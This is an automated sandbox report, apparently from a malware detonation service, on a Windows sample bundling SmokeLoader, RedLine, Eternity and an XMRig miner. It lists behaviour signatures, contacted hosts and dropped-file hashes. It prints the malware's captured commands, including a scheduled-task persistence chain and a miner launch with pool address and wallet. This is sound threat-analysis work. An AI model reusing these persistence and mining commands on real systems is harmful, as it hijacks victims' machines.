Malware Analysis Report

2025-06-16 03:47

Sample ID 220904-j8n1rscgdn
Target ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923
SHA256 ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923
Tags
eternity redline smokeloader xmrig installs-49 backdoor discovery infostealer miner spyware stealer trojan
score
10/10


Analysis Overview

score
10/10

SHA256

ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923

Threat Level: Known bad

The file ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923 was found to be: Known bad.

Malicious Activity Summary

eternity redline smokeloader xmrig installs-49 backdoor discovery infostealer miner spyware stealer trojan

Eternity

SmokeLoader

xmrig

Detects Smokeloader packer

RedLine

XMRig Miner payload

Executes dropped EXE

Downloads MZ/PE file

Checks computer location settings

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Suspicious behavior: MapViewOfSection

Runs ping.exe

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-04 08:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-04 08:20

Reported

2022-09-04 08:23

Platform

win10v2004-20220812-en

Max time kernel

152s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe"

Signatures

Detects Smokeloader packer

Description Indicator Process Target
N/A N/A N/A N/A

Eternity

eternity

RedLine

infostealer redline

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1FA8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Miner.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\1FA8.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\installs49.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3048 wrote to memory of 1748 N/A N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe
PID 3048 wrote to memory of 1748 N/A N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe
PID 3048 wrote to memory of 1748 N/A N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe
PID 1748 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 1748 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 1748 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\Miner.exe
PID 3668 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 3668 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 3668 wrote to memory of 1144 N/A C:\Users\Admin\AppData\Local\Temp\Miner.exe C:\Windows\SysWOW64\cmd.exe
PID 1144 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1144 wrote to memory of 1616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1144 wrote to memory of 1616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1144 wrote to memory of 1616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1748 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 1748 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 1748 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Local\Temp\1FA8.exe C:\Users\Admin\AppData\Local\Temp\installs49.exe
PID 1144 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1144 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1144 wrote to memory of 428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1144 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 1144 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 1144 wrote to memory of 4496 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe
PID 4496 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe
PID 4496 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe

"C:\Users\Admin\AppData\Local\Temp\ed1c41a20c214c391ae549808e0dea31c731a284df551bab65eeef58aa8b0923.exe"

C:\Users\Admin\AppData\Local\Temp\1FA8.exe

C:\Users\Admin\AppData\Local\Temp\1FA8.exe

C:\Users\Admin\AppData\Local\Temp\Miner.exe

"C:\Users\Admin\AppData\Local\Temp\Miner.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Miner.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\installs49.exe

"C:\Users\Admin\AppData\Local\Temp\installs49.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1748 -ip 1748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1748 -s 1424

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "Miner" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

"C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe"

C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

"C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe" -a cryptonight -o pool.supportxmr.com:3333 -u 45coZygmFLnRF5NY7Uz51tadci9wak52fbbhfgKR5q5BTB9QbKMiCnXiPiiwCwyUTQeF4nZD5mdAugj8yB5hTLA9ViAFFR8.Admin_XZIOFAVD -p --max-cpu-usage=40 --donate-level=1

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

Network

Country Destination Domain Proto
US 20.42.65.85:443 tcp
US 8.8.8.8:53 azd.at udp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
NL 104.80.225.205:443 tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
US 8.8.8.8:53 220903234255747.aib.mrn16.shop udp
LV 185.82.126.147:80 220903234255747.aib.mrn16.shop tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
NL 95.101.78.106:80 tcp
NL 87.248.202.1:80 tcp
NL 87.248.202.1:80 tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
KR 222.236.49.124:80 azd.at tcp
US 8.8.8.8:53 disk.yandex.ru udp
RU 87.250.250.50:443 disk.yandex.ru tcp
KR 222.236.49.124:80 azd.at tcp
US 8.8.8.8:53 inmusicbrands.com udp
US 50.57.112.151:443 inmusicbrands.com tcp
KR 222.236.49.124:80 azd.at tcp
LV 94.140.112.157:29329 tcp
US 8.8.8.8:53 rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet udp
US 198.251.83.154:80 rlcjba7wduej3xcstcjo577eqgjsjvcjfsw4i23fqvf2y27ylylhmhad.onion.pet tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 pool.supportxmr.com udp
FR 141.94.96.71:3333 pool.supportxmr.com tcp

Files

memory/4988-133-0x0000000002E30000-0x0000000002E39000-memory.dmp

memory/4988-132-0x0000000002F1D000-0x0000000002F2D000-memory.dmp

memory/4988-134-0x0000000000400000-0x0000000002B92000-memory.dmp

memory/4988-135-0x0000000002F1D000-0x0000000002F2D000-memory.dmp

memory/4988-136-0x0000000002E30000-0x0000000002E39000-memory.dmp

memory/4988-137-0x0000000000400000-0x0000000002B92000-memory.dmp

memory/1748-138-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\1FA8.exe

MD5 f1ae38e744808d4df42eed53c896323a
SHA1 0d0edac38a4e1a1c073aa99fc1009230a05deb74
SHA256 9508f7888f8d8f0297c20762f4a372e704649a903b961dfe9ac4a5dc12bb5439
SHA512 b23262fd0709c2cdf2702bab85a39ffeeebc28644e268ddecf5861bef6307b3f92c50a73b5725fa1a8578033c446bd957277224a24ed7ccd806bf3d0a77376d6

memory/1748-141-0x0000000007320000-0x00000000078C4000-memory.dmp

memory/1748-142-0x0000000002E4C000-0x0000000002E81000-memory.dmp

memory/1748-143-0x00000000047D0000-0x0000000004812000-memory.dmp

memory/1748-144-0x0000000000400000-0x0000000002BB6000-memory.dmp

memory/3668-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

memory/3668-148-0x0000000000230000-0x000000000023A000-memory.dmp

memory/3668-149-0x0000000004A60000-0x0000000004AC6000-memory.dmp

memory/1144-150-0x0000000000000000-mapping.dmp

memory/980-151-0x0000000000000000-mapping.dmp

memory/1616-152-0x0000000000000000-mapping.dmp

memory/1780-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\installs49.exe

MD5 24f5400ea175ed8a981c5f4184587ac4
SHA1 24b9e12675b4e5f389eb01d6c423e123909d02d9
SHA256 3be6f25cd0a2f0c367e34e6b2d300671626dcb7ce46aeb83f3396433d8da9bc4
SHA512 4d685f9f062359b6aae187cb88c98d55c059a316bccf6fc07aed3cbb172ee55edf84aa2fd53f67d9a5301195dddf7dc68e7e10ea2ffdf7d8a13750440f0a9669

memory/1780-156-0x0000000000830000-0x000000000084C000-memory.dmp

memory/1780-157-0x00000000061A0000-0x00000000067B8000-memory.dmp

memory/1780-158-0x00000000050D0000-0x00000000050E2000-memory.dmp

memory/1780-159-0x0000000005200000-0x000000000530A000-memory.dmp

memory/1780-160-0x0000000005130000-0x000000000516C000-memory.dmp

memory/1748-161-0x0000000002E4C000-0x0000000002E81000-memory.dmp

memory/1748-162-0x0000000000400000-0x0000000002BB6000-memory.dmp

memory/1780-163-0x0000000005B80000-0x0000000005C12000-memory.dmp

memory/428-164-0x0000000000000000-mapping.dmp

memory/4496-165-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\ServiceHub\Miner.exe

MD5 d1b22ce6e0f11c1b8283a85d9f902bbd
SHA1 8593038e651f856367d094b4541dd7cbffb8e7a3
SHA256 95aaf5cd2e08561391d3cc3056d8d629d7caa5ab5117bb7dbf0d7da1e3dbcdf8
SHA512 d212280985c97c6c9b4055783ae6839e42289a72a59c2863b93b1ce93edfd8ab16a5f802806f818360753e0e5f802392fbe0382eb7fae299e67bdec2205ad7ed

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Miner.exe.log

MD5 81ab0e59097e03cb04c32378024d6628
SHA1 cc2a7a335f905e787906b6a0820acfbd4c5d0ed2
SHA256 704dd8b8fb6dfccf43fd0712e36950102151fe7232d6602c53a42af967969533
SHA512 3dd1374962c4d913ad6ec4207889abcca3e28946fa8937626bd2d13025a538e676bfc2efe76d27031d3f741bb3934104c0cf4e10da62758839add1fe543dfacb

memory/1780-169-0x0000000006120000-0x0000000006196000-memory.dmp

memory/1780-170-0x0000000006100000-0x000000000611E000-memory.dmp

memory/1780-171-0x0000000006A10000-0x0000000006BD2000-memory.dmp

memory/1780-172-0x0000000007110000-0x000000000763C000-memory.dmp

memory/1780-173-0x0000000006BE0000-0x0000000006C30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Admin_XZIOFAVD.exe

MD5 84cbc72865b542c646bd89bb9430e7d1
SHA1 c8320b1e24f22b36c1a283506dacdcbcf5598a4f
SHA256 323a18d661fab8c743bb0584b4182902f49640a9ead4b9cedfb548889c25a9d4
SHA512 235afdba7fcf029920a20ac3d99ce0dacd87554d27a0e473ff5636c74f7f747ed9d242637d10963bac7461f789266191b37beaec0b9acdd2dc38b0f196ae65a8

memory/3848-174-0x0000000000000000-mapping.dmp

memory/3848-177-0x00000270338D0000-0x00000270338F0000-memory.dmp

memory/3848-178-0x0000027033910000-0x0000027033930000-memory.dmp

memory/3848-180-0x0000027035220000-0x0000027035240000-memory.dmp

memory/3848-179-0x0000027035200000-0x0000027035220000-memory.dmp

memory/3848-182-0x0000027035220000-0x0000027035240000-memory.dmp

memory/3848-181-0x0000027035200000-0x0000027035220000-memory.dmp